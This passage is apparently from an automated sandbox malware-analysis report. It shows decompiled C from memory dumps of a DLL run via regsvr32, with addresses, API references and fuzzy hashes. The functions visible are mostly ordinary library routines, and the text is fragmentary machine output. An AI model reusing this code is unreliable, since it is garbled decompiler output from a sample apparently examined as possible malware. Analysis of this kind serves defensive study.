							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E6DA21430( *(__ebp + 0xc) + 0xfffffff0);
							L4:
							_t52 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E6DA5C8E5(_t52);
			}

0x6da4e9a8
0x6da4e9af
0x6da4e9b9
0x6da4e9c2
0x6da4eb32
0x6da4eb32
0x6da4e9c8
0x6da4e9cf
0x00000000
0x6da4e9fb
0x6da4e9fe
0x6da4ea00
0x6da4ea01
0x6da4ea06
0x00000000
0x00000000
0x6da4e9d6
0x6da4e9d9
0x6da4e9db
0x6da4e9dc
0x6da4e9df
0x00000000
0x00000000
0x6da4eaaf
0x6da4eab2
0x6da4eab5
0x6da4eab7
0x6da4eab8
0x6da4eabb
0x6da4eac0
0x6da4eac2
0x6da4eac4
0x00000000
0x00000000
0x6da4e9ee
0x6da4e9f1
0x6da4e9f3
0x6da4e9f4
0x6da4e9f7
0x6da4e9e2
0x6da4e9e2
0x00000000
0x00000000
0x6da4eb14
0x6da4eb17
0x6da4eb21
0x6da4eb24
0x6da4eb2b
0x00000000
0x00000000
0x6da4eacd
0x6da4ead0
0x6da4ead2
0x6da4ead3
0x6da4ead6
0x6da4eadc
0x00000000
0x00000000
0x6da4ea09
0x6da4ea0d
0x6da4ea0f
0x6da4ea12
0x6da4ea15
0x6da4ea2b
0x6da4ea3d
0x6da4ea40
0x6da4ea46
0x6da4ea49
0x6da4ea4c
0x6da4ea4c
0x6da4ea51
0x6da4ea54
0x6da4ea56
0x6da4ea57
0x6da4ea5a
0x6da4ea60
0x6da4ea67
0x6da4ea62
0x6da4ea62
0x6da4ea62
0x6da4ea6a
0x00000000
0x00000000
0x6da4ea72
0x6da4ea76
0x6da4ea92
0x6da4ea92
0x6da4ea95
0x6da4ea97
0x6da4ea98
0x6da4ea9b
0x6da4ea9e
0x6da4eaa0
0x6da4eaa1
0x6da4eaa4
0x6da4eaa7
0x00000000
0x6da4ea78
0x6da4ea78
0x6da4ea7b
0x6da4ea81
0x6da4ea83
0x6da4ea88
0x6da4ea8c
0x00000000
0x00000000
0x00000000
0x00000000
0x6da4ea8c
0x00000000
0x00000000
0x6da4eae4
0x6da4eae7
0x6da4eaec
0x6da4eaec
0x6da4eaec
0x6da4eaf0
0x6da4eaf0
0x6da4eaf3
0x6da4eaf5
0x6da4eaf6
0x6da4eaf9
0x6da4eafc
0x6da4eb01
0x6da4eb04
0x6da4eb07
0x6da4eb0a
0x6da4e9e6
0x6da4e9e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6da4e9cf
0x6da4eb34
0x6da4eb39

APIs

__EH_prolog3.LIBCMT ref: 6DA4E9AF
SendMessageA.USER32 ref: 6DA4EA2B
GetBkColor.GDI32(?), ref: 6DA4EA34
GetTextColor.GDI32(?), ref: 6DA4EA40
GetThreadLocale.KERNEL32(0000F1C0,00000014), ref: 6DA4EAD6

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: c6ccc9c8c40c2a4eae6ef1f52a036fa4643605d29b76a23f59e65dcfc865b0f4
Instruction ID: 1aea81b3ca74267a37a44849198c88c8b0eeabd51f33e8906aabc03c81de2ee0
Opcode Fuzzy Hash: c6ccc9c8c40c2a4eae6ef1f52a036fa4643605d29b76a23f59e65dcfc865b0f4
Instruction Fuzzy Hash: 77416935558346DFCB25CF68C841AA9B7B0FF09324F15C91AE696DB2E1DB30EA81CB04

Uniqueness

Uniqueness Score: -1.00%

Function 6DA57878 Relevance: 7.6, APIs: 5, Instructions: 116
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E6DA57878(void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v264;
				char _v268;
				char* _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t41;
				void* _t45;
				short _t46;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t72;
				void* _t75;
				void* _t95;
				void* _t96;
				intOrPtr* _t97;
				void* _t98;
				short* _t100;
				void* _t101;
				signed int _t105;

				_t95 = __edx;
				_t103 = _t105;
				_t41 =  *0x6da82744; // 0x616b45bb
				_v8 = _t41 ^ _t105;
				_t72 = _a8;
				_t100 = _a4;
				_push(_t96);
				E6DA5C5A0(_t96, _t100, 0, 0x20);
				_v272 =  &_v264;
				_t45 = E6DA49AFE(_t72, 0x6da74588);
				_t97 = __imp__#2;
				if(_t45 == 0) {
					_t77 = _t72;
					_t46 = E6DA49AFE(_t72, 0x6da726f8);
					__eflags = _t46;
					_push(0x100);
					_push( &_v264);
					_t73 = 0xf10a;
					if(_t46 == 0) {
						_t73 = 0xf108;
						__eflags = 0xf10a;
					}
					_push(_t73);
					E6DA49A1E(_t73, _t77, _t97, _t100);
					 *_t100 = _t73;
				} else {
					_v272 =  *((intOrPtr*)(_t72 + 0xc));
					 *_t100 =  *((intOrPtr*)(_t72 + 8));
					 *((intOrPtr*)(_t100 + 0x10)) =  *((intOrPtr*)(_t72 + 0x10));
					 *((intOrPtr*)(_t100 + 0x1c)) =  *((intOrPtr*)(_t72 + 0x1c));
					_t64 =  *((intOrPtr*)(_t72 + 0x14));
					_t111 =  *((intOrPtr*)(_t64 - 0xc));
					if( *((intOrPtr*)(_t64 - 0xc)) != 0) {
						 *((intOrPtr*)(_t100 + 0xc)) =  *_t97( *((intOrPtr*)(E6DA4474C(_t72,  &_v268, _t97, _t100, _t111))), _t64);
						E6DA21430(_v268 + 0xfffffff0);
					}
					_t73 =  *((intOrPtr*)(_t72 + 0x18));
					_t113 =  *((intOrPtr*)(_t73 - 0xc));
					if( *((intOrPtr*)(_t73 - 0xc)) != 0) {
						 *((intOrPtr*)(_t100 + 4)) =  *_t97( *((intOrPtr*)(E6DA4474C(_t73,  &_v268, _t97, _t100, _t113))), _t73);
						E6DA21430(_v268 + 0xfffffff0);
					}
				}
				 *((intOrPtr*)(_t100 + 8)) =  *_t97( *((intOrPtr*)(E6DA4474C(_t73,  &_v268, _t97, _t100, _t113))), _v272);
				_t51 = E6DA21430(_v268 + 0xfffffff0);
				_t114 =  *((intOrPtr*)(_t100 + 4));
				if( *((intOrPtr*)(_t100 + 4)) == 0) {
					 *((intOrPtr*)(_t100 + 4)) =  *_t97( *((intOrPtr*)(E6DA4474C(0,  &_v268, _t97, _t100, _t114))),  *((intOrPtr*)(E6DA4984E(0, _t97, _t100, _t114) + 0x10)));
					_t51 = E6DA21430(_v268 + 0xfffffff0);
				}
				if( *((intOrPtr*)(_t100 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t100 + 0x10));
					if( *((intOrPtr*)(_t100 + 0x10)) != 0) {
						 *((intOrPtr*)(_t100 + 0xc)) =  *_t97( *((intOrPtr*)(E6DA4474C(0,  &_v268, _t97, _t100, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E6DA4984E(0, _t97, _t100, _t117) + 4)) + 0x64)));
						_t51 = E6DA21430(_v268 + 0xfffffff0);
					}
				}
				_pop(_t98);
				_pop(_t101);
				_pop(_t75);
				return E6DA59DE2(_t51, _t75, _v8 ^ _t103, _t95, _t98, _t101);
			}

0x6da57878
0x6da5787b
0x6da57883
0x6da5788a
0x6da5788e
0x6da57892
0x6da57895
0x6da5789b
0x6da578b0
0x6da578b6
0x6da578bb
0x6da578c3
0x6da5793c
0x6da5793e
0x6da57943
0x6da57945
0x6da57950
0x6da57951
0x6da57956
0x6da57958
0x6da57958
0x6da57958
0x6da5795b
0x6da5795c
0x6da57961
0x6da578c5
0x6da578c8
0x6da578d2
0x6da578d8
0x6da578de
0x6da578e1
0x6da578e4
0x6da578e8
0x6da57903
0x6da57906
0x6da57906
0x6da5790b
0x6da5790e
0x6da57912
0x6da5792d
0x6da57930
0x6da57930
0x6da57912
0x6da57982
0x6da57985
0x6da5798c
0x6da5798f
0x6da579b1
0x6da579b4
0x6da579b4
0x6da579bc
0x6da579be
0x6da579c1
0x6da579e6
0x6da579e9
0x6da579e9
0x6da579c1
0x6da579f1
0x6da579f2
0x6da579f5
0x6da579fc

APIs

SysAllocString.OLEAUT32(00000000), ref: 6DA578F8
SysAllocString.OLEAUT32(00000000), ref: 6DA57922

Part of subcall function 6DA4474C: __EH_prolog3.LIBCMT ref: 6DA44753

SysAllocString.OLEAUT32(00000000), ref: 6DA57977
SysAllocString.OLEAUT32(00000000), ref: 6DA579A6
SysAllocString.OLEAUT32(00000000), ref: 6DA579DB

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocString$H_prolog3
String ID:
API String ID: 2194952995-0
Opcode ID: 2b12dac73c0bb9d9a85ad00be81df65ae2ea903f25fbbfaf68c0ea47053b1235
Instruction ID: c69f990f0a0f70703112225a44f89c0252cc35a990277b048d41fd943787ccba
Opcode Fuzzy Hash: 2b12dac73c0bb9d9a85ad00be81df65ae2ea903f25fbbfaf68c0ea47053b1235
Instruction Fuzzy Hash: 6E41B47090C204CFCB20DF75CD80BA9B7B4EF15318F1186A9E695A72A1DBB099D1CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA45C79 Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DA45C79(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x6da85af0; // 0x60
					_t12 =  *0x6da85af4; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E6DA4526F(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x6da45c7e
0x6da45c81
0x6da45c86
0x6da45cd2
0x6da45cd8
0x00000000
0x6da45c88
0x6da45c91
0x6da45c96
0x6da45ccc
0x6da45cce
0x6da45cdd
0x6da45cdd
0x6da45cef
0x6da45cf8
0x6da45cfd
0x6da45cff
0x6da45c9d
0x6da45c9f
0x6da45ca3
0x6da45cab
0x6da45cb2
0x6da45cb5
0x6da45cb5
0x6da45c96
0x6da45d06

APIs

GetMapMode.GDI32(?), ref: 6DA45C8B
GetDeviceCaps.GDI32(?,00000058), ref: 6DA45CC5
GetDeviceCaps.GDI32(?,0000005A), ref: 6DA45CCE

Part of subcall function 6DA4526F: MulDiv.KERNEL32 ref: 6DA452B1
Part of subcall function 6DA4526F: MulDiv.KERNEL32 ref: 6DA452CE

MulDiv.KERNEL32 ref: 6DA45CF2
MulDiv.KERNEL32 ref: 6DA45CFD

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: f79bd630fe178367697fde37ae2a12b53d5c93d180ec010d30ababd67ea40bfe
Instruction ID: c12d1b358771bbcc9663018556a4ff09ed502f2d3cd8652782c2708f3acaf703
Opcode Fuzzy Hash: f79bd630fe178367697fde37ae2a12b53d5c93d180ec010d30ababd67ea40bfe
Instruction Fuzzy Hash: 6611E076608700AFDB119F55CD84D2EBBBAEF86711B118419EA8297350C771EC428F80

Uniqueness

Uniqueness Score: -1.00%

Function 6DA45BE9 Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DA45BE9(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x6da85af0; // 0x60
					_t12 =  *0x6da85af4; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E6DA452DA(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x6da45bee
0x6da45bf1
0x6da45bf6
0x6da45c42
0x6da45c48
0x00000000
0x6da45bf8
0x6da45c01
0x6da45c06
0x6da45c3c
0x6da45c3e
0x6da45c4d
0x6da45c4d
0x6da45c5f
0x6da45c67
0x6da45c6d
0x6da45c6f
0x6da45c0d
0x6da45c0f
0x6da45c13
0x6da45c1b
0x6da45c22
0x6da45c25
0x6da45c25
0x6da45c06
0x6da45c76

APIs

GetMapMode.GDI32(?), ref: 6DA45BFB
GetDeviceCaps.GDI32(?,00000058), ref: 6DA45C35
GetDeviceCaps.GDI32(?,0000005A), ref: 6DA45C3E

Part of subcall function 6DA452DA: MulDiv.KERNEL32 ref: 6DA4531C
Part of subcall function 6DA452DA: MulDiv.KERNEL32 ref: 6DA45339

MulDiv.KERNEL32 ref: 6DA45C62
MulDiv.KERNEL32 ref: 6DA45C6D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 4816662b734f20cd2f3f23b38f1508e2300c0970f8d3c09afd4616702f28b992
Instruction ID: df9b256de879abaede35991711b9cefe8abc2e50bcc93cc3db95656986704ec2
Opcode Fuzzy Hash: 4816662b734f20cd2f3f23b38f1508e2300c0970f8d3c09afd4616702f28b992
Instruction Fuzzy Hash: 65110276608705BFCB116F55CD84D2EBBB9FF8A710B118419FA8297360C7B1AC428F80

Uniqueness

Uniqueness Score: -1.00%

Function 6DA62C34 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E6DA62C34(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x6da7ec98);
				E6DA5C918(__ebx, __edi, __esi);
				_t31 = E6DA5F6C8(__ebx, __edx, __edi, _t35);
				_t15 =  *0x6da82ed4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E6DA641AD(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x6da82dd8; // 0x2117a8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x6da829b0;
								if(__eflags != 0) {
									_push(_t33);
									E6DA5AA38(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x6da82dd8; // 0x2117a8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x6da82dd8; // 0x2117a8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E6DA62CCF();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E6DA5D157(_t29, _t31, 0x20);
				}
				return E6DA5C95D(_t33);
			}

0x6da62c34
0x6da62c34
0x6da62c34
0x6da62c34
0x6da62c36
0x6da62c3b
0x6da62c45
0x6da62c47
0x6da62c4f
0x6da62c70
0x6da62c76
0x6da62c7a
0x6da62c7d
0x6da62c80
0x6da62c86
0x6da62c88
0x6da62c8a
0x6da62c8d
0x6da62c93
0x6da62c95
0x6da62c97
0x6da62c9d
0x6da62c9f
0x6da62ca0
0x6da62ca5
0x6da62c9d
0x6da62c95
0x6da62ca6
0x6da62cab
0x6da62cae
0x6da62cb4
0x6da62cb8
0x6da62cb8
0x6da62cbe
0x6da62cc5
0x6da62c57
0x6da62c57
0x6da62c57
0x6da62c5c
0x6da62c60
0x6da62c65
0x6da62c6d

APIs

__getptd.LIBCMT ref: 6DA62C40

Part of subcall function 6DA5F6C8: __getptd_noexit.LIBCMT ref: 6DA5F6CB
Part of subcall function 6DA5F6C8: __amsg_exit.LIBCMT ref: 6DA5F6D8

__amsg_exit.LIBCMT ref: 6DA62C60
__lock.LIBCMT ref: 6DA62C70
InterlockedDecrement.KERNEL32(?), ref: 6DA62C8D
InterlockedIncrement.KERNEL32(002117A8), ref: 6DA62CB8

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: cb744b0b46adddda9d6556a3a61b57ba4058d1649951a3323114ccaba74cda46
Instruction ID: ea6ea4be0a2702f0204e4e93a502771156c0702eca205b8044187b4039ec2484
Opcode Fuzzy Hash: cb744b0b46adddda9d6556a3a61b57ba4058d1649951a3323114ccaba74cda46
Instruction Fuzzy Hash: 6901C03AD0DB63DBDB319F298600B6D7B70BF42715F158006D910A7280C734A9D2CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6DA53277 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 293
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DA53277(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t127;
				signed int _t128;
				signed int* _t134;
				signed int* _t137;
				signed int _t138;
				signed int _t140;
				signed int* _t141;
				void* _t144;
				intOrPtr* _t148;
				signed int _t153;
				signed int _t154;
				signed int* _t156;
				signed int* _t158;
				intOrPtr* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t167;
				signed int _t168;
				intOrPtr* _t170;
				void* _t171;
				signed int _t172;
				signed int _t176;
				signed int _t177;
				signed int _t184;
				signed int _t186;
				signed int* _t188;
				signed int* _t190;
				signed int* _t193;
				signed int _t194;
				signed int _t205;
				signed int _t207;
				void* _t249;
				intOrPtr* _t253;
				void* _t254;
				void* _t262;
				void* _t265;

				_t192 = __ebx;
				_push(0x94);
				E6DA5C876(E6DA6ECFC, __ebx, __edi, __esi);
				_t253 = __ecx;
				 *(_t254 - 0x88) =  *(__ecx + 0x14);
				 *(_t254 - 0x80) =  *(__ecx + 0x10);
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t127 =  *(__ecx + 8);
					__eflags = _t127;
					if(_t127 != 0) {
						_t128 =  *((intOrPtr*)( *_t127 + 0xc))(_t127, 0x6da79208, _t254 - 0x78, _t254 - 0x7c);
						__eflags = _t128;
						if(_t128 >= 0) {
							E6DA4FE43(_t254 - 0x70, 0x6da798c8);
							 *(_t254 - 0x50) =  *(_t254 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t254 - 0x58)) = 0;
							 *((intOrPtr*)(_t254 - 0x54)) = 0;
							 *((intOrPtr*)(_t254 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t254 - 0x48)) = 0;
							 *((intOrPtr*)(_t254 - 0x44)) = 0x1fb;
							E6DA4FE43(_t254 - 0x40, 0x6da798e0);
							_t134 =  *(_t254 - 0x78);
							 *(_t254 - 0x20) =  *(_t254 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t254 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t254 - 0x24)) = 0;
							 *((intOrPtr*)(_t254 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t254 - 0x18)) = 0;
							 *((intOrPtr*)(_t254 - 0x14)) = 0x1e;
							_t192 =  *((intOrPtr*)( *_t134 + 0x10))(_t134, 2, _t254 - 0x70, 0x28, 0);
							__eflags = _t192;
							if(_t192 >= 0) {
								 *(_t254 - 0xa0) =  *(_t254 - 0x7c);
								_t137 =  *(_t254 - 0x78);
								 *((intOrPtr*)(_t254 - 0x9c)) = 1;
								 *(_t254 - 0x98) = 0;
								 *((intOrPtr*)(_t254 - 0x94)) = 0;
								 *((intOrPtr*)(_t254 - 0x90)) = 0;
								_t192 =  *_t137;
								_t138 =  *((intOrPtr*)( *_t137 + 0x18))(_t137, 0, 0, _t254 - 0xa0);
								__eflags = _t138;
								 *(_t254 - 0x84) = _t138;
								if(_t138 >= 0) {
									 *(_t253 + 0x14) =  *(_t254 - 0x98);
									_t140 =  *(_t254 - 0x8c);
									 *(_t254 - 0x7c) = _t140;
									 *(_t253 + 0x10) = _t140;
									_t141 =  *(_t254 - 0x78);
									 *((intOrPtr*)(_t253 + 0x34)) =  *((intOrPtr*)(_t254 - 0x94));
									 *((intOrPtr*)( *_t141 + 8))(_t141);
									goto L27;
								} else {
									_t156 =  *(_t254 - 0x78);
									 *((intOrPtr*)( *_t156 + 8))(_t156);
								}
								goto L45;
							} else {
								_t158 =  *(_t254 - 0x78);
								 *((intOrPtr*)( *_t158 + 8))(_t158);
							}
						}
					} else {
					}
				} else {
					_t162 =  *((intOrPtr*)(__ecx + 0x4c));
					_t163 =  *((intOrPtr*)( *_t162 + 0x14))(_t162, 0x6da793c8, _t254 - 0x74);
					 *(_t254 - 0x84) = _t163;
					if(_t163 >= 0) {
						_t164 =  *(_t254 - 0x74);
						_push(_t254 - 0x7c);
						_push(0x6da792c8);
						_push(_t164);
						if( *((intOrPtr*)( *_t164))() >= 0) {
							_t184 =  *(_t254 - 0x7c);
							_push(_t254 - 0x78);
							_push(0x6da794e8);
							 *(_t254 - 0x78) = 0;
							_push(_t184);
							if( *((intOrPtr*)( *_t184 + 0x10))() >= 0) {
								_t188 =  *(_t254 - 0x78);
								_t249 =  *((intOrPtr*)(__ecx + 4)) + 0xe8;
								_t262 = _t249;
								 *((intOrPtr*)( *_t188 + 0x14))(_t188, _t249, __ecx + 0x58);
								_t190 =  *(_t254 - 0x78);
								 *((intOrPtr*)( *_t190 + 8))(_t190);
							}
							_t186 =  *(_t254 - 0x7c);
							 *((intOrPtr*)( *_t186 + 8))(_t186);
						}
						if(E6DA3D6AF(_t262, 0x14) == 0) {
							_t167 = 0;
							__eflags = 0;
						} else {
							_t167 = E6DA52AB8(_t166,  *(_t254 - 0x74));
						}
						 *((intOrPtr*)(_t253 + 0x50)) = _t167;
						_t168 =  *(_t254 - 0x74);
						 *((intOrPtr*)( *_t168 + 8))(_t168);
						_t170 =  *((intOrPtr*)(_t253 + 0x50));
						_t221 =  *_t170;
						if( *_t170 != 0) {
							_t265 = _t170 + 4;
							E6DA500DE(_t221, _t170 + 4);
						}
						_t171 = E6DA3D6AF(_t265, 0x28);
						_t266 = _t171;
						if(_t171 == 0) {
							_t172 = 0;
							__eflags = 0;
						} else {
							_t172 = E6DA4EC6F(_t171, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t253 + 0x54)) = _t172;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x50)))));
						E6DA52C3A(_t192, _t172, 0, _t253, _t266);
						 *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x50)) + 8)) =  *((intOrPtr*)(_t253 + 0x54));
						_t176 =  *( *((intOrPtr*)(_t253 + 0x54)) + 0xc);
						 *(_t253 + 0x10) = _t176;
						if(_t176 <= 0x3333333) {
							_t177 = _t176 * 0x28;
							__imp__CoTaskMemAlloc(_t177);
							__eflags = _t177;
							_t226 = 0 | __eflags != 0x00000000;
							 *(_t253 + 0x14) = _t177;
							if(__eflags == 0) {
								_t177 = E6DA44860(_t226);
							}
							E6DA5C5A0(0, _t177, 0,  *(_t253 + 0x10) * 0x28);
							E6DA52ADF( *((intOrPtr*)(_t253 + 0x50)));
							E6DA50045( *((intOrPtr*)(_t253 + 0x50)));
							L27:
							__eflags =  *(_t253 + 0x10);
							 *(_t254 - 0x74) = 0;
							if( *(_t253 + 0x10) > 0) {
								_t194 = 0;
								__eflags = 0;
								do {
									_t153 = E6DA3D6AF(__eflags, 0x1c);
									 *(_t254 - 0x7c) = _t153;
									 *(_t254 - 4) = 0;
									__eflags = _t153;
									if(_t153 == 0) {
										_t154 = 0;
										__eflags = 0;
									} else {
										_t154 = E6DA4B024(_t153, 0xa);
									}
									 *(_t254 - 4) =  *(_t254 - 4) | 0xffffffff;
									 *(_t254 - 0x74) =  *(_t254 - 0x74) + 1;
									 *((intOrPtr*)(_t194 +  *(_t253 + 0x14) + 0x24)) = _t154;
									_t194 = _t194 + 0x28;
									__eflags =  *(_t254 - 0x74) -  *(_t253 + 0x10);
								} while (__eflags < 0);
							}
							_t192 =  *(_t254 - 0x88);
							__eflags = _t192;
							if(_t192 != 0) {
								__eflags =  *(_t254 - 0x80);
								if( *(_t254 - 0x80) > 0) {
									_t144 = 0xffffffdc;
									_t193 = _t192 + 0x24;
									 *(_t254 - 0x74) =  *(_t254 - 0x80);
									 *(_t254 - 0x7c) = _t144 -  *(_t254 - 0x88);
									while(1) {
										_t205 =  *( *_t193 + 4);
										 *(_t254 - 0x80) = _t205;
										__eflags = _t205;
										if(_t205 == 0) {
											goto L41;
										}
										while(1) {
											_t148 = E6DA3E977(_t254 - 0x80);
											 *((intOrPtr*)( *_t253 + 8))( *_t148, 1);
											__eflags =  *(_t254 - 0x80);
											if( *(_t254 - 0x80) == 0) {
												goto L41;
											}
										}
										L41:
										E6DA4AF3C( *_t193);
										_t207 =  *_t193;
										__eflags = _t207;
										if(_t207 != 0) {
											 *((intOrPtr*)( *_t207 + 4))(1);
										}
										_t193 =  &(_t193[0xa]);
										_t119 = _t254 - 0x74;
										 *_t119 =  *(_t254 - 0x74) - 1;
										__eflags =  *_t119;
										if( *_t119 != 0) {
											continue;
										}
										goto L44;
									}
								}
								L44:
